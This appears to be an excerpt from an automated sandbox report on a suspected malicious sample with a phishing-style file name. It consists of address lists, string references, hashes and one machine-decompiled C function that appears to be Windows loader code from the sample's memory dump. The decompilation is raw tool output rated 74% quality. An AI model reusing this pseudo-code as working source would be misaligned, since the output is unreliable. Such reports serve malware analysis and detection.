                                                                                                                                                                                  0x333b9fca
                                                                                                                                                                                  0x333b9fd0
                                                                                                                                                                                  0x333b9fd0
                                                                                                                                                                                  0x333b9fd3
                                                                                                                                                                                  0x333b9fdd
                                                                                                                                                                                  0x333b9fe2
                                                                                                                                                                                  0x333b9fe5
                                                                                                                                                                                  0x333b9fe8
                                                                                                                                                                                  0x333b9ff0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9ff0
                                                                                                                                                                                  0x333b9f58
                                                                                                                                                                                  0x333b9f5d
                                                                                                                                                                                  0x333b9f5d
                                                                                                                                                                                  0x333b9f62
                                                                                                                                                                                  0x333b9f65
                                                                                                                                                                                  0x333b9f6a
                                                                                                                                                                                  0x333b9f6d
                                                                                                                                                                                  0x333b9f70
                                                                                                                                                                                  0x333b9f72
                                                                                                                                                                                  0x333b9f75
                                                                                                                                                                                  0x333b9f78
                                                                                                                                                                                  0x333b9f78
                                                                                                                                                                                  0x333b9f7b
                                                                                                                                                                                  0x333b9f7e
                                                                                                                                                                                  0x333b9f7e
                                                                                                                                                                                  0x333b9f93
                                                                                                                                                                                  0x333b9f9a
                                                                                                                                                                                  0x333b9f9f
                                                                                                                                                                                  0x333b9fb4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9f13
                                                                                                                                                                                  0x333b9f13
                                                                                                                                                                                  0x333b9f18
                                                                                                                                                                                  0x333b9f1a
                                                                                                                                                                                  0x333b9f1c
                                                                                                                                                                                  0x333b9f21
                                                                                                                                                                                  0x333b9f23
                                                                                                                                                                                  0x333b9f24
                                                                                                                                                                                  0x333b9f29
                                                                                                                                                                                  0x333b9f2e
                                                                                                                                                                                  0x333b9f33
                                                                                                                                                                                  0x333b9f38
                                                                                                                                                                                  0x333b9f3d
                                                                                                                                                                                  0x333b9f3d
                                                                                                                                                                                  0x333b9f40
                                                                                                                                                                                  0x333b9f42
                                                                                                                                                                                  0x333b9f48
                                                                                                                                                                                  0x333b9f48
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9f42
                                                                                                                                                                                  0x333b9f11
                                                                                                                                                                                  0x33370b8a
                                                                                                                                                                                  0x33370b90
                                                                                                                                                                                  0x33370b96
                                                                                                                                                                                  0x33370ba1
                                                                                                                                                                                  0x33370baa
                                                                                                                                                                                  0x33370bb2
                                                                                                                                                                                  0x33370bb5
                                                                                                                                                                                  0x33370bb8
                                                                                                                                                                                  0x33370bbb
                                                                                                                                                                                  0x33370bbf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33370bbf
                                                                                                                                                                                  0x33370b4b

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 333B9F1C
                                                                                                                                                                                  • LdrpCheckModule, xrefs: 333B9F24
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 333B9F2E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 3446177414-161242083
                                                                                                                                                                                  • Opcode ID: abf1762dfe2ff8cfb3daeb97d748aba522750650d612ea23e38f350fea793290
                                                                                                                                                                                  • Instruction ID: 773f90027783e33efd9ba0474e148a10813238f7588974bb93801fa09d2c5a5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: abf1762dfe2ff8cfb3daeb97d748aba522750650d612ea23e38f350fea793290
                                                                                                                                                                                  • Instruction Fuzzy Hash: 31719E75E002059FEB04DF68C984AAEB7F8EF44708F18C46DE445E7A51E778EA42CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                  			E3337EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x3342c610);
				L333A7C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L33362330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E333624D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x334467f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x334467f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x334467f0; // 0x0
							_t309 =  *0x334467f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x2fed550
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E3337F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x334491e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2ff0fbc
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E333624D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L33362330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L33362330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E333624D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L33362330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2ff0fbc
										E333DC726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2ff0fbc
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2ff0fbc
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E3337F1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x2fed550
									_t86 = _t255 + 0x10; // 0x2ff0fbc
									 *0x334491e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x334491e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x334491e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = L33363C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x2ff0fbc
										_t250 = E333DC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E3337F1DB(_t250);
									_t228 = E3337F1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x2ff0fbc
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}
































                                                                                                                                                                                  0x3337ee48
                                                                                                                                                                                  0x3337ee4a
                                                                                                                                                                                  0x3337ee4f
                                                                                                                                                                                  0x3337ee54
                                                                                                                                                                                  0x3337ee56
                                                                                                                                                                                  0x3337ee5b
                                                                                                                                                                                  0x3337ee60
                                                                                                                                                                                  0x3337ee63
                                                                                                                                                                                  0x3337ee66
                                                                                                                                                                                  0x3337ee68
                                                                                                                                                                                  0x3337ee70
                                                                                                                                                                                  0x3337ee73
                                                                                                                                                                                  0x3337ee76
                                                                                                                                                                                  0x3337ee79
                                                                                                                                                                                  0x3337ee80
                                                                                                                                                                                  0x3337ee85
                                                                                                                                                                                  0x3337ee88
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337ee8b
                                                                                                                                                                                  0x3337ee93
                                                                                                                                                                                  0x3337ee98
                                                                                                                                                                                  0x3337ee9f
                                                                                                                                                                                  0x3337eeac
                                                                                                                                                                                  0x3337eeb8
                                                                                                                                                                                  0x3337eeb8
                                                                                                                                                                                  0x3337eebe
                                                                                                                                                                                  0x3337eec6
                                                                                                                                                                                  0x3337eec9
                                                                                                                                                                                  0x3337eec9
                                                                                                                                                                                  0x3337eece
                                                                                                                                                                                  0x3337eece
                                                                                                                                                                                  0x3337eece
                                                                                                                                                                                  0x3337eece
                                                                                                                                                                                  0x3337eece
                                                                                                                                                                                  0x3337eece
                                                                                                                                                                                  0x3337eed3
                                                                                                                                                                                  0x3337eed6
                                                                                                                                                                                  0x3337eedb
                                                                                                                                                                                  0x3337eee0
                                                                                                                                                                                  0x3337eee6
                                                                                                                                                                                  0x3337eeee
                                                                                                                                                                                  0x3337eeee
                                                                                                                                                                                  0x3337eef0
                                                                                                                                                                                  0x3337eef4
                                                                                                                                                                                  0x3337eef6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f1dc
                                                                                                                                                                                  0x3337f1dc
                                                                                                                                                                                  0x3337eefc
                                                                                                                                                                                  0x3337eefc
                                                                                                                                                                                  0x3337ef01
                                                                                                                                                                                  0x3337ef03
                                                                                                                                                                                  0x3337ef06
                                                                                                                                                                                  0x3337ef09
                                                                                                                                                                                  0x3337ef0c
                                                                                                                                                                                  0x3337ef0f
                                                                                                                                                                                  0x3337ef0f
                                                                                                                                                                                  0x3337ef16
                                                                                                                                                                                  0x3337ef16
                                                                                                                                                                                  0x3337ef1b
                                                                                                                                                                                  0x3337ef20
                                                                                                                                                                                  0x3337ef26
                                                                                                                                                                                  0x3337ef29
                                                                                                                                                                                  0x3337ef2c
                                                                                                                                                                                  0x3337ef2c
                                                                                                                                                                                  0x3337ef36
                                                                                                                                                                                  0x3337ef36
                                                                                                                                                                                  0x3337ef3b
                                                                                                                                                                                  0x3337ef40
                                                                                                                                                                                  0x3337ef46
                                                                                                                                                                                  0x3337ef4c
                                                                                                                                                                                  0x3337ef54
                                                                                                                                                                                  0x3337ef57
                                                                                                                                                                                  0x3337ef59
                                                                                                                                                                                  0x3337ef60
                                                                                                                                                                                  0x3337ef63
                                                                                                                                                                                  0x3337ef63
                                                                                                                                                                                  0x3337ef66
                                                                                                                                                                                  0x3337ef69
                                                                                                                                                                                  0x3337ef6c
                                                                                                                                                                                  0x3337f113
                                                                                                                                                                                  0x3337f113
                                                                                                                                                                                  0x3337f115
                                                                                                                                                                                  0x3337f122
                                                                                                                                                                                  0x3337f127
                                                                                                                                                                                  0x3337f12b
                                                                                                                                                                                  0x333bfe64
                                                                                                                                                                                  0x333bfe6a
                                                                                                                                                                                  0x333bfe6a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f12b
                                                                                                                                                                                  0x3337ef72
                                                                                                                                                                                  0x3337ef74
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337ef7a
                                                                                                                                                                                  0x3337ef7d
                                                                                                                                                                                  0x3337ef7d
                                                                                                                                                                                  0x3337ef7d
                                                                                                                                                                                  0x3337ef81
                                                                                                                                                                                  0x3337f144
                                                                                                                                                                                  0x3337f144
                                                                                                                                                                                  0x3337f14a
                                                                                                                                                                                  0x333bfd20
                                                                                                                                                                                  0x333bfd23
                                                                                                                                                                                  0x3337ef90
                                                                                                                                                                                  0x3337ef90
                                                                                                                                                                                  0x3337ef93
                                                                                                                                                                                  0x333bfd2e
                                                                                                                                                                                  0x333bfd31
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfd37
                                                                                                                                                                                  0x333bfd45
                                                                                                                                                                                  0x333bfd4b
                                                                                                                                                                                  0x333bfd4b
                                                                                                                                                                                  0x333bfd4e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfd54
                                                                                                                                                                                  0x333bfd3c
                                                                                                                                                                                  0x333bfd3f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfd3f
                                                                                                                                                                                  0x3337ef99
                                                                                                                                                                                  0x3337ef99
                                                                                                                                                                                  0x3337ef9c
                                                                                                                                                                                  0x3337f1a6
                                                                                                                                                                                  0x3337f1a9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f1af
                                                                                                                                                                                  0x3337efa2
                                                                                                                                                                                  0x3337efa2
                                                                                                                                                                                  0x3337efa5
                                                                                                                                                                                  0x3337efab
                                                                                                                                                                                  0x3337efae
                                                                                                                                                                                  0x3337efb4
                                                                                                                                                                                  0x3337efba
                                                                                                                                                                                  0x3337efc0
                                                                                                                                                                                  0x3337efc6
                                                                                                                                                                                  0x3337efcc
                                                                                                                                                                                  0x3337efd8
                                                                                                                                                                                  0x3337efde
                                                                                                                                                                                  0x3337efe1
                                                                                                                                                                                  0x3337efe7
                                                                                                                                                                                  0x3337efe9
                                                                                                                                                                                  0x3337efec
                                                                                                                                                                                  0x3337eff3
                                                                                                                                                                                  0x3337eff8
                                                                                                                                                                                  0x3337effa
                                                                                                                                                                                  0x3337efff
                                                                                                                                                                                  0x3337f002
                                                                                                                                                                                  0x3337f008
                                                                                                                                                                                  0x3337f00a
                                                                                                                                                                                  0x3337f15d
                                                                                                                                                                                  0x3337f164
                                                                                                                                                                                  0x3337f165
                                                                                                                                                                                  0x3337f168
                                                                                                                                                                                  0x3337f16b
                                                                                                                                                                                  0x3337f16e
                                                                                                                                                                                  0x3337f170
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f176
                                                                                                                                                                                  0x3337f17a
                                                                                                                                                                                  0x3337f1c8
                                                                                                                                                                                  0x3337f1cf
                                                                                                                                                                                  0x3337f1d0
                                                                                                                                                                                  0x3337f1d3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f1d3
                                                                                                                                                                                  0x3337f17c
                                                                                                                                                                                  0x3337f105
                                                                                                                                                                                  0x3337f105
                                                                                                                                                                                  0x3337f108
                                                                                                                                                                                  0x3337f10a
                                                                                                                                                                                  0x3337f1b7
                                                                                                                                                                                  0x3337f1b7
                                                                                                                                                                                  0x3337f110
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f110
                                                                                                                                                                                  0x3337f010
                                                                                                                                                                                  0x3337f010
                                                                                                                                                                                  0x3337f013
                                                                                                                                                                                  0x3337f0a2
                                                                                                                                                                                  0x3337f0a2
                                                                                                                                                                                  0x3337f0a6
                                                                                                                                                                                  0x3337f186
                                                                                                                                                                                  0x3337f186
                                                                                                                                                                                  0x3337f0ac
                                                                                                                                                                                  0x3337f0b0
                                                                                                                                                                                  0x333bfe56
                                                                                                                                                                                  0x333bfe56
                                                                                                                                                                                  0x3337f103
                                                                                                                                                                                  0x3337f103
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f103
                                                                                                                                                                                  0x3337f0bc
                                                                                                                                                                                  0x3337f0c3
                                                                                                                                                                                  0x3337f0c4
                                                                                                                                                                                  0x3337f0c7
                                                                                                                                                                                  0x3337f0ce
                                                                                                                                                                                  0x333bfe35
                                                                                                                                                                                  0x333bfe35
                                                                                                                                                                                  0x333bfe39
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfe41
                                                                                                                                                                                  0x333bfe41
                                                                                                                                                                                  0x333bfe42
                                                                                                                                                                                  0x333bfe48
                                                                                                                                                                                  0x333bfe51
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfe51
                                                                                                                                                                                  0x3337f0d4
                                                                                                                                                                                  0x3337f0db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f0e1
                                                                                                                                                                                  0x3337f0e5
                                                                                                                                                                                  0x3337f193
                                                                                                                                                                                  0x3337f199
                                                                                                                                                                                  0x3337f19b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f0f4
                                                                                                                                                                                  0x3337f0f4
                                                                                                                                                                                  0x3337f0f8
                                                                                                                                                                                  0x3337f0fa
                                                                                                                                                                                  0x3337f0fd
                                                                                                                                                                                  0x333bfe1e
                                                                                                                                                                                  0x333bfe21
                                                                                                                                                                                  0x333bfe24
                                                                                                                                                                                  0x333bfe27
                                                                                                                                                                                  0x333bfe2a
                                                                                                                                                                                  0x333bfe2d
                                                                                                                                                                                  0x333bfe2d
                                                                                                                                                                                  0x3337f0fd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f0f8
                                                                                                                                                                                  0x3337f0eb
                                                                                                                                                                                  0x3337f0ee
                                                                                                                                                                                  0x3337f0f1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f0f1
                                                                                                                                                                                  0x3337f01c
                                                                                                                                                                                  0x3337f01f
                                                                                                                                                                                  0x3337f02a
                                                                                                                                                                                  0x3337f02d
                                                                                                                                                                                  0x3337f030
                                                                                                                                                                                  0x3337f034
                                                                                                                                                                                  0x3337f036
                                                                                                                                                                                  0x3337f039
                                                                                                                                                                                  0x3337f045
                                                                                                                                                                                  0x3337f051
                                                                                                                                                                                  0x3337f05a
                                                                                                                                                                                  0x3337f05a
                                                                                                                                                                                  0x3337f05d
                                                                                                                                                                                  0x3337f060
                                                                                                                                                                                  0x3337f062
                                                                                                                                                                                  0x333bfd59
                                                                                                                                                                                  0x333bfd5c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfd62
                                                                                                                                                                                  0x333bfd66
                                                                                                                                                                                  0x333bfd72
                                                                                                                                                                                  0x333bfd84
                                                                                                                                                                                  0x333bfd8a
                                                                                                                                                                                  0x333bfd8d
                                                                                                                                                                                  0x333bfd90
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bfd90
                                                                                                                                                                                  0x333bfd68
                                                                                                                                                                                  0x333bfd6c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337f068
                                                                                                                                                                                  0x3337f068
                                                                                                                                                                                  0x3337f068
                                                                                                                                                                                  0x3337f06d
                                                                                                                                                                                  0x333bfd98
                                                                                                                                                                                  0x333bfda8
                                                                                                                                                                                  0x333bfdae
                                                                                                                                                                                  0x333bfdae
                                                                                                                                                                                  0x3337f073
                                                                                                                                                                                  0x3337f078
                                                                                                                                                                                  0x3337f07a
                                                                                                                                                                                  0x333bfdbf
                                                                                                                                                                                  0x3337f080
                                                                                                                                                                                  0x3337f080
                                                                                                                                                                                  0x3337f080
                                                                                                                                                                                  0x3337f085
